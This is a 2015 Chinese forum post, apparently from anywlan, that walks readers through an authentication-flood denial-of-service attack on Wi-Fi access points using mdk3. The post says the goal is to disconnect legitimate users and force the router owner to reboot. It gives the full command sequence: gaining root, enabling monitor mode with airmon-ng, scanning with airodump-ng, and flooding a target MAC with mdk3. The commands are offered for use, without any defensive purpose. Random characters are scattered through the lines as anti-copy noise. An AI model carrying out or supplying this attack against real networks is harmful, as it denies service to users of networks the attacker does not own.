本帖最后由 191966260 于 2015-2-2 22:49 编辑
% ^4 j+ a4 r9 M" s3 A! E% Q. ?: e3 n
身份验证攻击效果说明:0 e4 l- _/ ?0 }: A! ~8 I. e7 w2 f! a7 `
此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。 # S, w) W& P4 i8 o' |! T
下面是我整理的整个攻击的步骤及命令,有不明白兄弟可以留言探讨! (很多兄弟都会发现自己的linux系统中找不到mdk3,然后满世界去找mdk3,却发现无处下载。哈哈,其实你们的Linux中都是有mdk3的,只是菜单里找不到而已,我们用终端命令就可以打开它了!BELIEVE ME!) 打开终端并获取root权限(鼠标右键单击或者菜单里都可以找到终端):- a% X- o9 @5 O2 {# h$ K
sudo su 或 sudo -i" a/ {! S! c2 I3 f
打开mdk3:
+ U3 t, R" t0 c/ N lsudo mdk3 首先检测网卡:
6 R* B3 w. Q& _% [9 h8 zifconfig -a 然后模拟端口(一般默认wlan0):
3 I( k0 L7 R2 b+ i7 Nairmon-ng start wlan0 接着扫描AP(ctrl+c暂停):
( ]# r" \5 J8 pairodump-ng mon0 最后用mdk3做身份验证攻击(举例:mdk3 mon0 a -a 00:00:00:00:00) t$ x S+ d4 r
mdk3 mon0 a -a mac
' J9 D0 g$ E& D7 A* @4 d
* i" ~- m C d9 Q+ n3 s6 u
% r) l* r% E7 ]! c$ ]* H$ I: B% o, N4 U6 ^$ h
爱生活,爱anywlan,我是阿龙!
; t0 M: a0 e- b) M |